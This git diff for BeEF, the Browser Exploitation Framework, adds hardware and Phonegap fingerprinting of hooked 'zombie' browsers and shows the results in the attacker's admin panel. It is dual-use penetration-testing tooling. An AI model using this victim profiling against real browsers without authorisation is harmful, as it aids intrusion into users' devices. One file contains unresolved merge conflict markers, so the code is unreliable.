diff --git a/VERSION b/VERSION
index 509c304b2..f9105b3dc 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
# limitations under the License.
#
-0.4.3.5-alpha
+0.4.3.6-alpha
diff --git a/config.yaml b/config.yaml
index 41728f809..b9d4f8f08 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
- version: '0.4.3.5-alpha'
+ version: '0.4.3.6-alpha'
debug: false
restrictions:
diff --git a/core/core.rb b/core/core.rb
index dc554314b..6dcff13f2 100644
--- a/core/core.rb
+++ b/core/core.rb
@@ -34,6 +34,7 @@ require 'core/main/constants/browsers'
require 'core/main/constants/commandmodule'
require 'core/main/constants/distributedengine'
require 'core/main/constants/os'
+require 'core/main/constants/hardware'
# @note Include core modules for beef
require 'core/main/configuration'
diff --git a/core/filters/browser.rb b/core/filters/browser.rb
index f955fb6f6..7dbcfdfc6 100644
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -47,6 +47,16 @@ module Filters
true
end
+ # Check the Hardware name value - for example, 'iPhone'
+ # @param [String] str String for testing
+ # @return [Boolean] If the string has valid Hardware name characters
+ def self.is_valid_hwname?(str)
+ return false if not is_non_empty_string?(str)
+ return false if has_non_printable_char?(str)
+ return false if str.length < 2
+ true
+ end
+
# Verify the browser version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser version characters
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 762072108..2e82f5de6 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -551,6 +551,19 @@ beef.browser = {
},
+ /**
+ * Checks if the Phonegap API is available from the hooked domain.
+ * @return: {Boolean} true or false.
+ *
+ * @example: if(beef.browser.hasJava()) { ... }
+ */
+ hasPhonegap: function() {
+ var result = false;
+ try { if (!!device.phonegap) result = true; else result = false; }
+ catch(e) { result = false; }
+ return result;
+ },
+
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -765,6 +778,7 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
+ var hw_name = beef.hardware.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_size = beef.browser.getScreenSize();
@@ -772,6 +786,7 @@ beef.browser = {
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
+ var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
@@ -789,6 +804,7 @@ beef.browser = {
if(hostport) details["HostPort"] = hostport;
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
+ if(hw_name) details['Hardware'] = hw_name;
if(date_stamp) details['DateStamp'] = date_stamp;
if(system_platform) details['SystemPlatform'] = system_platform;
if(browser_type) details['BrowserType'] = browser_type;
@@ -797,6 +813,7 @@ beef.browser = {
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
+ if(has_phonegap) details['HasPhonegap'] = has_phonegap
if(has_web_socket) details['HasWebSocket'] = has_web_socket
if(has_googlegears) details['HasGoogleGears'] = has_googlegears
if(has_activex) details['HasActiveX'] = has_activex;
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
new file mode 100644
index 000000000..f498c53ac
--- /dev/null
+++ b/core/main/client/hardware.js
@@ -0,0 +1,74 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.hardware = {
+
+ ua: navigator.userAgent,
+
+ isWinPhone: function() {
+ return (this.ua.match('(Windows Phone)')) ? true : false;
+ },
+
+ isIphone: function() {
+ return (this.ua.indexOf('iPhone') != -1) ? true : false;
+ },
+
+ isIpad: function() {
+ return (this.ua.indexOf('iPad') != -1) ? true : false;
+ },
+
+ isIpod: function() {
+ return (this.ua.indexOf('iPod') != -1) ? true : false;
+ },
+
+ isNokia: function() {
+ return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+ },
+
+ isBlackBerry: function() {
+ return (this.ua.match('BlackBerry')) ? true : false;
+ },
+
+ isZune: function() {
+ return (this.ua.match('ZuneWP7')) ? true : false;
+ },
+
+ isKindle: function() {
+ return (this.ua.match('Kindle')) ? true : false;
+ },
+
+ getName: function() {
+
+ if(this.isNokia()) {
+
+ if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
+ if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
+ if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
+
+ //return 'Nokia';
+ }
+
+ if (this.isWinPhone()) return 'Windows Phone';
+ if (this.isBlackBerry()) return 'BlackBerry';
+ if (this.isIphone()) return 'iPhone';
+ if (this.isIpad()) return 'iPad';
+ if (this.isIpod()) return 'iPod';
+ if (this.isKindle()) return 'Kindle';
+
+ return 'unknown';
+ }
+};
+
+beef.regCmp('beef.net.hardware');
diff --git a/core/main/client/os.js b/core/main/client/os.js
index c133edcc9..9ccea8a9c 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -72,7 +72,11 @@ beef.os = {
isMacintosh: function() {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
-
+
+ isWinPhone: function() {
+ return (this.ua.match('(Windows Phone)')) ? true : false;
+ },
+
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
@@ -97,6 +101,10 @@ beef.os = {
return (this.ua.match('BlackBerry')) ? true : false;
},
+ isWebOS: function() {
+ return (this.ua.match('webOS')) ? true : false;
+ },
+
isQNX: function() {
return (this.ua.match('QNX')) ? true : false;
},
@@ -139,11 +147,14 @@ beef.os = {
if(this.isSunOS()) return 'Sun OS';
//iPhone
- if (this.isIphone()) return 'iPhone';
+ if (this.isIphone()) return 'iOS';
//iPad
- if (this.isIpad()) return 'iPad';
+ if (this.isIpad()) return 'iOS';
//iPod
- if (this.isIpod()) return 'iPod';
+ if (this.isIpod()) return 'iOS';
+
+ // zune
+ //if (this.isZune()) return 'Zune';
//macintosh
if(this.isMacintosh()) {
@@ -156,6 +167,7 @@ beef.os = {
//others
if(this.isQNX()) return 'QNX';
if(this.isBeOS()) return 'BeOS';
+ if(this.isWebOS()) return 'webOS';
return 'unknown';
}
diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
new file mode 100644
index 000000000..63958a210
--- /dev/null
+++ b/core/main/constants/hardware.rb
@@ -0,0 +1,73 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+module BeEF
+module Core
+module Constants
+
+ # @note The hardware's strings for hardware detection.
+ module Hardware
+
+ HW_UNKNOWN_IMG = 'pc.png'
+ HW_IPHONE_UA_STR = 'iPhone'
+ HW_IPHONE_IMG = 'iphone.jpg'
+ HW_IPAD_UA_STR = 'iPad'
+ HW_IPAD_IMG = 'ipad.png'
+ HW_IPOD_UA_STR = 'iPod'
+ HW_IPOD_IMG = 'ipod.jpg'
+ HW_BLACKBERRY_UA_STR = 'BlackBerry'
+ HW_BLACKBERRY_IMG = 'blackberry.png'
+ HW_ANDROID_UA_STR = 'Android'
+ HW_ANDROID_IMG = 'android.png'
+ HW_WINPHONE_UA_STR = 'Windows Phone'
+ HW_WINPHONE_IMG = 'win.png'
+ HW_ZUNE_UA_STR = 'ZuneWP7'
+ HW_ZUNE_IMG = 'zune.gif'
+ HW_KINDLE_UA_STR = 'Kindle'
+ HW_KINDLE_IMG = 'kindle.png'
+ HW_ALL_UA_STR = 'All'
+
+ # Attempt to match operating system string to constant
+ # @param [String] name Name of operating system
+ # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched
+ def self.match_hardware(name)
+ case name.downcase
+ when /iphone/
+ HW_IPHONE_UA_STR
+ when /ipad/
+ HW_IPAD_UA_STR
+ when /ipod/
+ HW_IPOD_UA_STR
+ when /blackberry/
+ HW_BLACKBERRY_UA_STR
+ when /android/
+ HW_ANDROID_UA_STR
+ when /windows phone/
+ HW_WINPHONE_UA_STR
+ when /zune/
+ HW_ZUNE_UA_STR
+ when /kindle/
+ HW_KINDLE_UA_STR
+ else
+ 'ALL'
+ end
+ end
+
+ end
+
+end
+end
+end
diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb
index 2e86f1e39..15c8a1b67 100644
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -29,17 +29,19 @@ module Constants
OS_MAC_UA_STR = 'Mac'
OS_MAC_IMG = 'mac.png'
OS_QNX_UA_STR = 'QNX'
- OS_QNX_IMG = 'qnx.ico'
+ OS_QNX_IMG = 'qnx.ico'
OS_BEOS_UA_STR = 'BeOS'
- OS_BEOS_IMG = 'beos.png'
+ OS_BEOS_IMG = 'beos.png'
OS_OPENBSD_UA_STR = 'OpenBSD'
OS_OPENBSD_IMG = 'openbsd.ico'
+ OS_IOS_UA_STR = 'iOS'
+ OS_IOS_IMG = 'ios.png'
OS_IPHONE_UA_STR = 'iPhone'
- OS_IPHONE_IMG = 'iphone.png'
+ OS_IPHONE_IMG = 'iphone.jpg'
OS_IPAD_UA_STR = 'iPad'
- OS_IPAD_IMG = 'ipad.png'
+ OS_IPAD_IMG = 'ipad.png'
OS_IPOD_UA_STR = 'iPod'
- OS_IPOD_IMG = 'ipod.jpg'
+ OS_IPOD_IMG = 'ipod.jpg'
OS_MAEMO_UA_STR = 'Maemo'
OS_MAEMO_IMG = 'maemo.ico'
OS_BLACKBERRY_UA_STR = 'BlackBerry'
@@ -65,12 +67,8 @@ module Constants
OS_BEOS_UA_STR
when /openbsd/
OS_OPENBSD_UA_STR
- when /iphone/
- OS_IPHONE_UA_STR
- when /ipad/
- OS_IPAD_UA_STR
- when /ipod/
- OS_IPOD_UA_STR
+ when /ios/, /iphone/, /ipad/, /ipod/
+ OS_IOS_UA_STR
when /maemo/
OS_MAEMO_UA_STR
when /blackberry/
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index dfb3b8040..9a5f27946 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -118,6 +118,14 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
+ # get and store the hardware name
+ hw_name = get_param(@data['results'], 'Hardware')
+ if BeEF::Filters.is_valid_hwname?(hw_name)
+ BD.set(session_id, 'Hardware', hw_name)
+ else
+ self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+ end
+
# get and store the date
date_stamp = get_param(@data['results'], 'DateStamp')
if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -222,6 +230,14 @@ module BeEF
self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
end
+ # get and store the yes|no value for HasPhonegap
+ has_phonegap = get_param(@data['results'], 'HasPhonegap')
+ if BeEF::Filters.is_valid_yes_no?(has_phonegap)
+ BD.set(session_id, 'HasPhonegap', has_phonegap)
+ else
+ self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
+ end
+
# get and store the yes|no value for HasGoogleGears
has_googlegears = get_param(@data['results'], 'HasGoogleGears')
if BeEF::Filters.is_valid_yes_no?(has_googlegears)
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index aa1fc5694..b2743a1e6 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -32,9 +32,15 @@ module Modules
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
+<<<<<<< HEAD
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js websocket.js )
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
+=======
+ js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
+ else
+ js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+>>>>>>> 123b81b2b47ce59c45d6e59e489b342b85a70a77
end
# @note construct the beefjs string from file(s)
diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 0cd114c75..ae3868691 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -62,7 +62,7 @@ module Models
browserdetails
end
-
+
#
# Returns the icon representing the browser type the
# hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +94,10 @@ module Models
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
- return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
- return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
- return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+ return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +106,26 @@ module Models
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end
+ #
+ # Returns the icon representing the hardware the
+ # zombie is running on (i.e. iPhone, BlackBerry)
+ #
+ def self.hw_icon(session_id)
+
+ ua_string = get(session_id, 'BrowserReportedName')
+
+ return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+ return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+
+ BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+ end
+
end
end
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index b30573a0d..6fce2a02c 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -136,7 +136,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
- if not host_name.nil?
+ if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
@@ -148,6 +148,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
+
+ # set and add the return values for the hardware name
+ hw_name = BD.get(zombie_session, 'Hardware')
+ if not hw_name.nil?
+ encoded_hw_name = CGI.escapeHTML(hw_name)
+ encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+ page_name_row = {
+ 'category' => 'Host',
+ 'data' => encoded_hw_name_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
@@ -331,6 +346,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the yes|no value for hasPhonegap
+ has_phonegap = BD.get(zombie_session, 'hasPhonegap')
+ if not has_phonegap.nil?
+ encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+ encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+ page_name_row = {
+ 'category' => 'Browser',
+ 'data' => encoded_has_phonegap_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
if not has_googlegears.nil?
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index f50adb121..6c101681a 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -84,18 +84,38 @@ class Panel < BeEF::Extension::AdminUI::HttpController
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
-
- browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
- os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
- domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
-
+
+ browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
+ browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
+ browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
+ os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
+ os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
+ hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
+ hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
+ domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
+ has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+ has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
+ has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
+ has_phonegap = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasPhonegap')
+ date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
+
return {
- 'session' => hooked_browser.session,
- 'ip' => hooked_browser.ip,
- 'domain' => domain,
- 'port' => hooked_browser.port.to_s,
- 'browser_icon' => browser_icon,
- 'os_icon' => os_icon
+ 'session' => hooked_browser.session,
+ 'ip' => hooked_browser.ip,
+ 'domain' => domain,
+ 'port' => hooked_browser.port.to_s,
+ 'browser_name' => browser_name,
+ 'browser_version' => browser_version,
+ 'browser_icon' => browser_icon,
+ 'os_icon' => os_icon,
+ 'os_name' => os_name,
+ 'hw_icon' => hw_icon,
+ 'hw_name' => hw_name,
+ 'has_flash' => has_flash,
+ 'has_web_sockets' => has_web_sockets,
+ 'has_googlegears' => has_googlegears,
+ 'has_phonegap' => has_phonegap,
+ 'date_stamp' => date_stamp
}
end
diff --git a/extensions/admin_ui/media/images/icons/ios.png b/extensions/admin_ui/media/images/icons/ios.png
new file mode 100644
index 000000000..de94a27ce
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/ios.png differ
diff --git a/extensions/admin_ui/media/images/icons/iphone.jpg b/extensions/admin_ui/media/images/icons/iphone.jpg
new file mode 100644
index 000000000..134b5c9f9
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/iphone.jpg differ
diff --git a/extensions/admin_ui/media/images/icons/iphone.png b/extensions/admin_ui/media/images/icons/iphone.png
deleted file mode 100644
index ab4a8cc31..000000000
Binary files a/extensions/admin_ui/media/images/icons/iphone.png and /dev/null differ
diff --git a/extensions/admin_ui/media/images/icons/kindle.png b/extensions/admin_ui/media/images/icons/kindle.png
new file mode 100644
index 000000000..b858fc003
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/kindle.png differ
diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png
new file mode 100644
index 000000000..d8f38aca7
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/pc.png differ
diff --git a/extensions/admin_ui/media/images/icons/zune.gif b/extensions/admin_ui/media/images/icons/zune.gif
new file mode 100644
index 000000000..6d8259b13
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/zune.gif differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index c764f94cf..e161c8209 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -20,18 +20,49 @@ var ZombiesMgr = function(zombies_tree_lists) {
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
- text = "![](/ui/media/images/icons/"+escape(zombie_array[index]["browser_icon"])+")
";
- text += "![](/ui/media/images/icons/"+escape(zombie_array[index]["os_icon"])+")
";
- text += zombie_array[index]["ip"];
+
+ var ip = zombie_array[index]["ip"];
+ var session = zombie_array[index]["session"];
+ var browser_name = zombie_array[index]["browser_name"];
+ var browser_version = zombie_array[index]["browser_version"];
+ var browser_icon = zombie_array[index]["browser_icon"];
+ var os_icon = zombie_array[index]["os_icon"];
+ var os_name = zombie_array[index]["os_name"];
+ var hw_name = zombie_array[index]["hw_name"];
+ var hw_icon = zombie_array[index]["hw_icon"];
+ var domain = zombie_array[index]["domain"];
+ var port = zombie_array[index]["port"];
+ var has_flash = zombie_array[index]["has_flash"];
+ var has_web_sockets = zombie_array[index]["has_web_sockets"];
+ var has_googlegears = zombie_array[index]["has_googlegears"];
+ var has_phonegap = zombie_array[index]["has_phonegap"];
+ var date_stamp = zombie_array[index]["date_stamp"];
+
+ text = "![](/ui/media/images/icons/"+escape(browser_icon)+")
";
+ text+= "![](/ui/media/images/icons/"+escape(os_icon)+")
";
+ text+= "![](/ui/media/images/icons/"+escape(hw_icon)+")
";
+ text+= ip;
+
+ balloon_text = "IP: " + ip;
+ balloon_text+= "
Browser: " + browser_name + " " + browser_version;
+ balloon_text+= "
System: " + os_name;
+ balloon_text+= "
Hardware: " + hw_name;
+ balloon_text+= "
Domain: " + domain + ":" + port;
+ balloon_text+= "
Flash: " + has_flash;
+ balloon_text+= "
Web Sockets: " + has_web_sockets;
+ balloon_text+= "
Google Gears: " + has_googlegears;
+ balloon_text+= "
Phonegap API: " + has_phonegap;
+ balloon_text+= "
Date: " + date_stamp;
var new_zombie = {
- 'id' : index,
- 'ip' : zombie_array[index]["ip"],
- 'session' : zombie_array[index]["session"],
- 'text': text,
- 'check' : false,
- 'domain' : zombie_array[index]["domain"],
- 'port' : zombie_array[index]["port"]
+ 'id' : index,
+ 'ip' : ip,
+ 'session' : session,
+ 'text' : text,
+ 'balloon_text' : balloon_text,
+ 'check' : false,
+ 'domain' : domain,
+ 'port' : port
};
return new_zombie;
diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
index 5537ee34e..aa04f300f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
@@ -36,6 +36,7 @@ zombiesTreeList = function(id) {
//the tree node that contains the list of online hooked browsers
this.online_hooked_browsers_treenode = this.root.appendChild(
new Ext.tree.TreeNode({
+ qtip: "Online hooked browsers",
text:'Online Browsers',
cls:'online-zombies-node',
expanded:true
@@ -45,6 +46,7 @@ zombiesTreeList = function(id) {
//the tree node that contains the list of offline hooked browsers
this.offline_hooked_browsers_treenode = this.root.appendChild(
new Ext.tree.TreeNode({
+ qtip: "Offline hooked browsers",
text:'Offline Browsers',
cls:'offline-zombies-node',
expanded:false
@@ -183,7 +185,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
*/
addZombie: function(hooked_browser, online, checkbox) {
var hb_id, mother_node, node;
-
+
if(online) {
hb_id = 'zombie-online-' + hooked_browser.session;
mother_node = this.online_hooked_browsers_treenode;
@@ -193,7 +195,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
}
var exists = this.getNodeById(hb_id);
if(exists) return;
-
+
+ hooked_browser.qtip = hooked_browser.balloon_text;
+
//save a new online HB
if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) {
this.online_hooked_browsers_array.push(hooked_browser);
@@ -216,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new node for that hooked browser
node = new Ext.tree.TreeNode(hooked_browser);
-
+
//creates a sub-branch for that HB if necessary
mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox);
@@ -253,6 +257,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
sub_folder_node = new Ext.tree.TreeNode({
id: 'sub-folder-'+folder,
text: folder,
+ qtip: "Browsers hooked on "+folder,
checked: ((checkbox) ? false : null),
type: this.tree_configuration["sub-branch"]
});
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index a896184cb..f810c042e 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -358,6 +358,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the return values for the os name
+ hw_name = BD.get(self.targetsession, 'Hardware')
+ if not hw_name.nil?
+ encoded_hw_name = CGI.escapeHTML(hw_name)
+ encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+ page_name_row = {
+ 'category' => 'Host',
+ 'data' => encoded_hw_name_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
@@ -535,6 +550,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the yes|no value for HasPhonegap
+ has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
+ if not has_phonegap.nil?
+ encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+ encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+ page_name_row = {
+ 'category' => 'Browser',
+ 'data' => encoded_has_phonegap_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
if not has_googlegears.nil?
diff --git a/extensions/evasion/evasion.rb b/extensions/evasion/evasion.rb
index b86cca957..aaf3019d9 100644
--- a/extensions/evasion/evasion.rb
+++ b/extensions/evasion/evasion.rb
